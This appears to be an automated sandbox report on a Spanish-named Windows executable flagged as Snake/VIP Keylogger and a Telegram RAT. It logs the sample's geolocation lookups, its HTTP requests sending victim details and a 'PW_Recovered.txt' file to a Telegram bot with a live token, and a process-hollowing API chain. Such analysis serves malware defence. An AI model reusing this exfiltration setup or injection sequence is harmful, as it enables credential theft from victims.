                                                                                            Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</R
                                                                                            2024-10-31 09:35:26 UTC200INData Raw: 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                            Data Ascii: egionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.1149850188.114.97.34437336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-31 09:35:30 UTC87OUTGET /xml/173.254.250.77 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-31 09:35:30 UTC1214INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:30 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 359
                                                                                            Connection: close
                                                                                            x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710
                                                                                            x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0
                                                                                            x-cache: Miss from cloudfront
                                                                                            via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront)
                                                                                            x-amz-cf-pop: DFW57-P5
                                                                                            x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew==
                                                                                            Cache-Control: max-age=31536000
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 4205
                                                                                            Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9OCTszw%2FpNV2kLFhIDX9WtRBKJ7Q8w8PPNo6iqPiWNHjYBM0wEex%2BdmOjjTGYUnwDmfub2wvNx876XoC4RL4UGhOYht9UoeUYnD37J9X4QF45CUebRVO4CG75HJVo6F4aXoc7gWZ"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8db2a7c58c50486a-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1052&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2704014&cwnd=251&unsent_bytes=0&cid=98eca8e108a71aef&ts=149&x=0"
                                                                                            2024-10-31 09:35:30 UTC155INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61
                                                                                            Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texa
                                                                                            2024-10-31 09:35:30 UTC204INData Raw: 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                            Data Ascii: s</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.1149861188.114.97.34437336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-31 09:35:31 UTC87OUTGET /xml/173.254.250.77 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-31 09:35:31 UTC1220INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:31 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 359
                                                                                            Connection: close
                                                                                            x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710
                                                                                            x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0
                                                                                            x-cache: Miss from cloudfront
                                                                                            via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront)
                                                                                            x-amz-cf-pop: DFW57-P5
                                                                                            x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew==
                                                                                            Cache-Control: max-age=31536000
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 4206
                                                                                            Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qtLqXuCXGUdslAoOANXD%2FZt9689y1KzeNOWu9jfpqlmRvnQ8Q2yBwEUL%2FxBmEfbQflapGn2RoQIVuIpYZd8%2BszIiV%2Fg0qEYpZ1NpLSj40KkJnnTS7TkITLoUdY%2FlDAMYehEsJpGj"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8db2a7d07906eaf2-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1086&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2632727&cwnd=250&unsent_bytes=0&cid=6afb20382d400c69&ts=204&x=0"
                                                                                            2024-10-31 09:35:31 UTC149INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d
                                                                                            Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionNam
                                                                                            2024-10-31 09:35:31 UTC210INData Raw: 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                            Data Ascii: e>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.1149871188.114.97.34437336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-31 09:35:33 UTC87OUTGET /xml/173.254.250.77 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-31 09:35:33 UTC1222INHTTP/1.1 200 OK
                                                                                            Date: Thu, 31 Oct 2024 09:35:33 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 359
                                                                                            Connection: close
                                                                                            x-amzn-requestid: c513f531-357c-4a16-aa65-2a7ce9db2710
                                                                                            x-amzn-trace-id: Root=1-67233ef5-6f781100758ed25925d14b1f;Parent=79f937a2f15fcb5d;Sampled=0;Lineage=1:fc9e8231:0
                                                                                            x-cache: Miss from cloudfront
                                                                                            via: 1.1 6731676908e2f9fd15d695e4cfc5dc0c.cloudfront.net (CloudFront)
                                                                                            x-amz-cf-pop: DFW57-P5
                                                                                            x-amz-cf-id: vn-E2QddJo8J5bH3iv-sVGfh-RHrFUSg7-ibKlijEvDnaoVwc3aSew==
                                                                                            Cache-Control: max-age=31536000
                                                                                            CF-Cache-Status: HIT
                                                                                            Age: 4208
                                                                                            Last-Modified: Thu, 31 Oct 2024 08:25:25 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BLmb4Yy3KU25Bo5asUB5rtSuDW%2BnzYQPSgQ0CaNHMforEeJqYSUiUm8ZE0%2Fn2SosaWv1pVJjLpNM83xDLQkjpCOWwY%2F1ALjCpcNiNe%2Bsg26W%2BwHwqjzn3%2FXA3EtK0FFjj2P1jTKg"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8db2a7dabbab6bfb-DFW
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1163&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2460492&cwnd=251&unsent_bytes=0&cid=d5878ebbc38b64ad&ts=144&x=0"
                                                                                            2024-10-31 09:35:33 UTC147INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e
                                                                                            Data Ascii: <Response><IP>173.254.250.77</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionN
                                                                                            2024-10-31 09:35:33 UTC212INData Raw: 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 31 2e 30 30 36 35 3c 2f 4c 61 74 69 74 75 64 65 3e 0a 09 3c 4c 6f 6e 67 69 74 75 64 65 3e 2d 39 37 2e 38 34 30 36 3c 2f 4c 6f 6e 67 69 74 75 64 65 3e 0a 09 3c 4d 65 74 72 6f 43 6f 64 65 3e 36 32 35 3c 2f 4d 65 74 72 6f 43 6f 64 65 3e 0a 3c 2f 52 65 73 70 6f 6e 73 65 3e 0a
                                                                                            Data Ascii: ame>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>31.0065</Latitude><Longitude>-97.8406</Longitude><MetroCode>625</MetroCode></Response>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            9192.168.2.1149877149.154.167.2204437336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-31 09:35:34 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2001/11/2024%20/%2001:21:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                            Host: api.telegram.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-10-31 09:35:34 UTC344INHTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.18.0
                                                                                            Date: Thu, 31 Oct 2024 09:35:34 GMT
                                                                                            Content-Type: application/json
                                                                                            Content-Length: 55
                                                                                            Connection: close
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                            2024-10-31 09:35:34 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            10192.168.2.1149913149.154.167.2204437336C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-10-31 09:35:41 UTC344OUTPOST /bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendDocument?chat_id=8178506397&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dcfa7be7f62c54
                                                                                            Host: api.telegram.org
                                                                                            Content-Length: 578
                                                                                            2024-10-31 09:35:41 UTC578OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 61 37 62 65 37 66 36 32 63 35 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 74 6f 74 74 69 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 30 33 33 38 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 33 31 2f 31 30 2f 32 30 32 34 20 2f 20 30 35 3a 33 35 3a 30 31 0d
                                                                                            Data Ascii: --------------------------8dcfa7be7f62c54Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:103386Date and Time: 31/10/2024 / 05:35:01
                                                                                            2024-10-31 09:35:42 UTC388INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0
                                                                                            Date: Thu, 31 Oct 2024 09:35:41 GMT
                                                                                            Content-Type: application/json
                                                                                            Content-Length: 512
                                                                                            Connection: close
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                            2024-10-31 09:35:42 UTC512INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 35 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 38 33 32 31 38 35 32 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 68 6f 6e 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 68 6f 6e 65 31 32 34 35 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 38 31 37 38 35 30 36 33 39 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 64 38 33 64 5c 75 64 65 32 39 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 50 61 72 6b 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 30 33 36 37 33 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a
                                                                                            Data Ascii: {"ok":true,"result":{"message_id":572,"from":{"id":7783218527,"is_bot":true,"first_name":"Phone","username":"Phone1245bot"},"chat":{"id":8178506397,"first_name":"\ud83d\ude29","last_name":"Park","type":"private"},"date":1730367341,"document":{"file_name":


                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:2
                                                                                            Start time:05:34:59
                                                                                            Start date:31/10/2024
                                                                                            Path:C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe"
                                                                                            Imagebase:0xba0000
                                                                                            File size:815'104 bytes
                                                                                            MD5 hash:4CF66DE9BFDF5BB65B4151F456DB83DF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:05:35:01
                                                                                            Start date:31/10/2024
                                                                                            Path:C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe"
                                                                                            Imagebase:0xe00000
                                                                                            File size:815'104 bytes
                                                                                            MD5 hash:4CF66DE9BFDF5BB65B4151F456DB83DF
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:false

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:10.6%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:3.6%
                                                                                              Total number of Nodes:222
                                                                                              Total number of Limit Nodes:12
                                                                                              execution_graph 24735 150d5e0 24736 150d626 24735->24736 24740 150d7c0 24736->24740 24743 150d7b1 24736->24743 24737 150d713 24746 150b234 24740->24746 24744 150d7ee 24743->24744 24745 150b234 DuplicateHandle 24743->24745 24744->24737 24745->24744 24747 150d828 DuplicateHandle 24746->24747 24748 150d7ee 24747->24748 24748->24737 24749 781f7f0 24750 781f97b 24749->24750 24752 781f816 24749->24752 24752->24750 24753 781b4b0 24752->24753 24754 781fe78 PostMessageW 24753->24754 24755 781fee4 24754->24755 24755->24752 24756 781dff3 24757 781dff9 24756->24757 24762 781e5a0 24757->24762 24780 781e616 24757->24780 24799 781e5b0 24757->24799 24758 781e004 24763 781e5a4 24762->24763 24770 781e5d2 24763->24770 24817 781f069 24763->24817 24822 781ed89 24763->24822 24827 781e9c7 24763->24827 24832 781ed62 24763->24832 24840 781f362 24763->24840 24845 781eadd 24763->24845 24850 781f25d 24763->24850 24855 781ec19 24763->24855 24860 781edd9 24763->24860 24864 781ebf7 24763->24864 24869 781ebb7 24763->24869 24874 781eb52 24763->24874 24879 781ee8f 24763->24879 24884 781ea2c 24763->24884 24890 781efac 24763->24890 24770->24758 24781 781e5a4 24780->24781 24782 781e619 24780->24782 24783 781e5d2 24781->24783 24784 781f362 2 API calls 24781->24784 24785 781ed62 4 API calls 24781->24785 24786 781e9c7 2 API calls 24781->24786 24787 781ed89 2 API calls 24781->24787 24788 781f069 2 API calls 24781->24788 24789 781efac 2 API calls 24781->24789 24790 781ea2c 2 API calls 24781->24790 24791 781ee8f 2 API calls 24781->24791 24792 781eb52 2 API calls 24781->24792 24793 781ebb7 2 API calls 24781->24793 24794 781ebf7 2 API calls 24781->24794 24795 781edd9 2 API calls 24781->24795 24796 781ec19 2 API calls 24781->24796 24797 781f25d 2 API calls 24781->24797 24798 781eadd 2 API calls 24781->24798 24783->24758 24784->24783 24785->24783 24786->24783 24787->24783 24788->24783 24789->24783 24790->24783 24791->24783 24792->24783 24793->24783 24794->24783 24795->24783 24796->24783 24797->24783 24798->24783 24800 781e5ca 24799->24800 24801 781e5d2 24800->24801 24802 781f362 2 API calls 24800->24802 24803 781ed62 4 API calls 24800->24803 24804 781e9c7 2 API calls 24800->24804 24805 781ed89 2 API calls 24800->24805 24806 781f069 2 API calls 24800->24806 24807 781efac 2 API calls 24800->24807 24808 781ea2c 2 API calls 24800->24808 24809 781ee8f 2 API calls 24800->24809 24810 781eb52 2 API calls 24800->24810 24811 781ebb7 2 API calls 24800->24811 24812 781ebf7 2 API calls 24800->24812 24813 781edd9 2 API calls 24800->24813 24814 781ec19 2 API calls 24800->24814 24815 781f25d 2 API calls 24800->24815 24816 781eadd 2 API calls 24800->24816 24801->24758 24802->24801 24803->24801 24804->24801 24805->24801 24806->24801 24807->24801 24808->24801 24809->24801 24810->24801 24811->24801 24812->24801 24813->24801 24814->24801 24815->24801 24816->24801 24818 781f07a 24817->24818 24895 781d511 24818->24895 24899 781d518 24818->24899 24819 781f2dd 24823 781f46d 24822->24823 24825 781d511 WriteProcessMemory 24823->24825 24826 781d518 WriteProcessMemory 24823->24826 24824 781f491 24825->24824 24826->24824 24828 781ea1a 24827->24828 24903 781d7a0 24828->24903 24907 781d795 24828->24907 24833 781f080 24832->24833 24834 781eceb 24833->24834 24919 781d380 24833->24919 24923 781d378 24833->24923 24835 781ef1e 24834->24835 24911 781ce91 24834->24911 24915 781ce98 24834->24915 24835->24770 24927 781d450 24840->24927 24931 781d458 24840->24931 24841 781eb48 24841->24840 24842 781ed04 24841->24842 24846 781e9f8 24845->24846 24848 781d7a0 CreateProcessA 24846->24848 24849 781d795 CreateProcessA 24846->24849 24847 781eb1d 24847->24770 24848->24847 24849->24847 24851 781f263 24850->24851 24935 781d601 24851->24935 24939 781d608 24851->24939 24852 781f286 24856 781f06d 24855->24856 24858 781d511 WriteProcessMemory 24856->24858 24859 781d518 WriteProcessMemory 24856->24859 24857 781f2dd 24858->24857 24859->24857 24862 781d380 Wow64SetThreadContext 24860->24862 24863 781d378 Wow64SetThreadContext 24860->24863 24861 781edf3 24861->24770 24862->24861 24863->24861 24865 781ec04 24864->24865 24866 781ef1e 24865->24866 24867 781ce91 ResumeThread 24865->24867 24868 781ce98 ResumeThread 24865->24868 24866->24770 24867->24865 24868->24865 24870 781ebde 24869->24870 24872 781d511 WriteProcessMemory 24870->24872 24873 781d518 WriteProcessMemory 24870->24873 24871 781f140 24872->24871 24873->24871 24875 781eb48 24874->24875 24876 781ed04 24875->24876 24877 781d450 VirtualAllocEx 24875->24877 24878 781d458 VirtualAllocEx 24875->24878 24877->24875 24878->24875 24880 781eceb 24879->24880 24881 781ef1e 24880->24881 24882 781ce91 ResumeThread 24880->24882 24883 781ce98 ResumeThread 24880->24883 24881->24770 24882->24880 24883->24880 24886 781e9d8 24884->24886 24885 781f540 24885->24770 24886->24885 24888 781d7a0 CreateProcessA 24886->24888 24889 781d795 CreateProcessA 24886->24889 24887 781eb1d 24887->24770 24888->24887 24889->24887 24891 781eceb 24890->24891 24892 781ef1e 24891->24892 24893 781ce91 